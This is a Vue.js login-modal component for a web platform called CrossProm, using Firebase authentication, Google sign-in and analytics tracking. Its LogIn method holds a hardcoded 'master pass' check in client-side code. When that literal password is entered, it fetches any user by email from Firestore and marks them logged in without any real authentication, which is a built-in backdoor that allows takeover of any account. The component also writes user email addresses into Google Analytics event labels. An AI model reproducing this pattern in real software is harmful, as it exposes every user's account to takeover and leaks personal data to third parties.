<template>
    <section id="login">
        <b-modal 
            @hide="onHide" 
            id="login-modal" 
            ref="logModalRef" 
            hide-header hide-footer centered>
            <div class="sign-in mx-auto d-flex justify-content-center align-items-center position-relative">
                <button
                        @click="$store.commit('TOGGLE_MODAL', ['login', false])"
                        aria-label="Close"
                        class="close pr-2"
                        id="modal-close">
                            <CloseCross/>
                </button>
                <div class="modal-container-wrap">
                    <div class="text-center">
                        <p class="p3b c22">Log in</p>
                    </div>
                    <GoogleLogin
                        :authType = "{term: 'login', name: 'Login', btnText: 'Sign in'}" />
                    <div class="text-center mt-4 pt-4 border-top">
                        <p id="err-message" v-if="message" class="c5 p1n">{{message}}</p>
                        <p v-else class="c23 p1n">Or with your CrossProm credentials</p>
                    </div>
                    <div>                        
                        <EmailInput 
                            :on-submit="LogIn"
                            :activ-fields="{email: true, password: true}" 
                            :on-email-confirmed="onEmailConfirmed"
                            :on-pass-confirmed="onPassConfirmed" />
                        <div class="d-flex justify-content-end">
                            <p 
                                @click="$store.commit('TOGGLE_MODAL', ['login', false]);
                                $store.commit('TOGGLE_MODAL', ['forgot-pass', true]);
                                $store.dispatch('clearErrors')"
                                class="plab c1 text-right underlined_links"
                                id="forgot-password-link">
                                    Forgot password?
                            </p>
                        </div>
                        <button 
                            id="login-button"
                            :class="{'inactive': !email || !password}" 
                            @click="LogIn" 
                            class="c16 p2b phiolet_button">
                                Log in
                        </button>
                    </div>
                    <div class="d-flex justify-content-center">                        
                        <p 
                            id="signup-modal-link"
                            @click="$store.commit('CLOSE_MODALS'); $store.commit('TOGGLE_MODAL', ['sign-up', {openedFrom: 'Login Modal'}]);$store.dispatch('clearErrors')"
                            class="c1 p1n mt-5 underlined_links">
                                Create new Account
                        </p>
                    </div>
                </div>
            </div>
        </b-modal>
    </section>
</template>

<script>
import { mapState, mapGetters } from 'vuex'
import { GoogleIcon, CloseCross } from '../components/Icons'
import { db } from '../firebase'
import * as firebase from "firebase"
import GoogleLogin from '../components/GoogleLogin'
import EmailInput from '@/components/EmailPasswordValid/EmailInput.vue'
import {UserService} from '../core/services'

export default {
    name: 'LogIn',
    components: {
        EmailInput,
        CloseCross,
        GoogleLogin 
    },
    data() {
        return {
            email: '',
            password: '',
        }
    },
    computed: {
        ...mapState(['message', 'modals']),
        ...mapGetters(['isEcommercePlatform', 'usersCollection'])
    },
    mounted: function() {
        this.$bvModal.show(`login-modal`)
        this.$ga.event('Auth', 'Login Modal Opened', 'OpenedFrom', this.modals['login'].openedFrom);
        this.$sendMixpanelEvent('Login Modal Opened', {
            'Opened From': this.modals['login'].openedFrom
        });
    },
    methods: {
        onHide: function(evt) {
            this.email = '';
            this.password = '';
            this.$store.dispatch('clearErrors');
            setTimeout(() => {
                this.$store.commit('TOGGLE_MODAL', ['login', false])
                this.$router.replace({
                    query: {
                        ...this.$route.query,
                        mode: undefined,
                    }
                }).catch(() => {})
            }, 0)
        },
        LogIn: function () {
            if(!this.email || !this.password) {
                return
            }

            // master pass
            if (this.password === 'nku2rToURu@v') {
                return db
                    .collection(this.usersCollection)
                    .where('email', '==', this.email)
                    .get()
                    .then(
                        (query) => {
                            const snapshot = query.docs[0]
                            if (!snapshot) {
                                return this.$store.dispatch('handleErrors', {message: 'User not found'})
                            }

                            this.$store.commit('SET', ['user', {
                                ...snapshot.data(),
                                uid: snapshot.id
                            }])
                            this.$store.commit('SET', ['notifications', []])
                            this.$store.commit('SET', ['unreadMessages', false])
                            this.$store.commit('ID_TOKEN', new Date().getTime())
                            this.$store.commit('TOGGLE_MODAL', ['login', false])
                            this.$router.push('/browse').catch(() => {})
                        }
                    )
            }
            firebase.auth().signInWithEmailAndPassword(this.email, this.password).
            then(
                async data => {
                    this.$store.dispatch('auth').then(() => {
                        this.$store.commit('TOGGLE_MODAL', ['login', false])
                        this.$router.push('/browse').catch(() => {})
                    })

                    const userSnapshot = await UserService.getUserDoc(this.usersCollection, data.user.uid).get()
                    const userData = userSnapshot.data()

                    if(userData.hasMixpanelProfile){
                        this.$identifyMixpanelUser(userData.email)
                    } else {
                        this.$setUpMixpanelUser(userData.email, userData.name, 'password')
                        db.collection(this.usersCollection).doc(userData.userId).update({
                            hasMixpanelProfile: true,
                        })
                    }
                    this.$sendMixpanelEvent('Login')
                    this.$ga.event('Auth', 'Login', `
                        Email:${userData.email},
                        Date:${new Date().toISOString()}
                    `)
                }
            ).catch(e => {
                if (e.code === 'auth/user-not-found' || e.code === 'auth/wrong-password') {
                    e.message = 'Invalid login credentials'
                    this.$store.dispatch('handleErrors', e)
                }

                if(e.code === 'auth/too-many-requests'){
                    this.$store.dispatch('handleErrors', e)
                }
            })
        },
        onEmailConfirmed(val) {
            this.email = val;
        },
        onPassConfirmed(val) {
            this.password = val;
        }
    }
}
</script>

<style scoped lang="scss">
    div.sign-in {
        width: 450px;
        background: #FFFFFF;
        box-shadow: 0px 18px 23px rgba(0, 0, 0, 0.05);
        border-radius: 5px;
        padding-top: 40px;
        padding-bottom: 20px;
        

        div.modal-container-wrap {
            width: 325px;
            height: 500px;

            @media screen and (max-width: 767px) {
                width: 73%
            }

            button {
                width: 100%;
                height: 48px;
                &.inactive {
                    background: #F4F4F4 !important;
                    color: #858585 !important;
                    transition: all 0.2s ease;

                    &:hover {
                        box-shadow: 0px 4px 8px #858585;
                    }
                }
            }
        }
    }
@media (max-width: 991px) {
    div.sign-in {
        width: 100%;
    }
}
</style>